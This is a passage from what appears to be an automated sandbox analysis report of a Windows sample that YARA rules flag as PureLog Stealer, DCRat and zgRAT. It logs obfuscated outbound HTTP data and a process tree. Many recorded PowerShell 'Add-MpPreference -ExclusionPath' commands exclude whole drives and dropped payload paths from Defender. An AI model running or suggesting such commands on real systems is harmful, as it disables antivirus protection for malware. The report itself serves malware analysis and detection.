                                                                                          Jan 4, 2025 11:09:35.467626095 CET2516OUTData Raw: 51 5a 5b 53 50 5c 5f 53 5c 5b 52 58 57 5a 58 52 58 54 5a 59 52 5c 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ[SP\_S\[RXWZXRXTZYR\Q\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@*?C"8!%?\*-Z!)Y3=' X&+/*&3]7*+!Y#!Y,
                                                                                          Jan 4, 2025 11:09:35.565550089 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:35.824965000 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:35 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yZZksmgC7%2Ff3JDYPUAmAyhWslRlS2hP%2Bi6Drw4clFRsYCqxyw4RP8d9ekro7CAxURqiSIAOGjXSJzECT9%2BmbajcKKS6%2FzX8ZotxR61sh%2BMSQ2yDzF0ehB0VORusiDW0fn4YyPHZ4"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f1508cf5e7a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3774&min_rtt=1633&rtt_var=4895&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=77808&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:05:06:56
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Users\user\Desktop\HMhdtzxEHf.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\HMhdtzxEHf.exe"
                                                                                          Imagebase:0xa30000
                                                                                          File size:4'000'497 bytes
                                                                                          MD5 hash:BC8116E0B506345BF1DE248886A52F86
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1665452904.000000000650D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1665910452.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:1
                                                                                          Start time:05:06:56
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe"
                                                                                          Imagebase:0x50000
                                                                                          File size:147'456 bytes
                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:05:07:02
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" "
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:05:07:02
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:05:07:02
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\ChainbrowserNet\serverDll.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\ChainbrowserNet/serverDll.exe"
                                                                                          Imagebase:0x330000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1722682939.0000000000332000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1976233128.0000000012D03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainbrowserNet\serverDll.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainbrowserNet\serverDll.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 65%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:24
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:25
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:26
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:27
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:28
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:29
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:30
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:31
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:32
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:33
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:34
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:35
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:36
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:37
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:38
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:39
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:40
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:41
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:42
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:43
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:44
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:45
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:46
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:47
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:48
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:49
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:50
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:51
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:52
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:53
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:54
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:55
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:56
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:57
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:58
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:59
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:60
                                                                                          Start time:05:07:08
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:61
                                                                                          Start time:05:07:08
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:62
                                                                                          Start time:05:07:08
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe
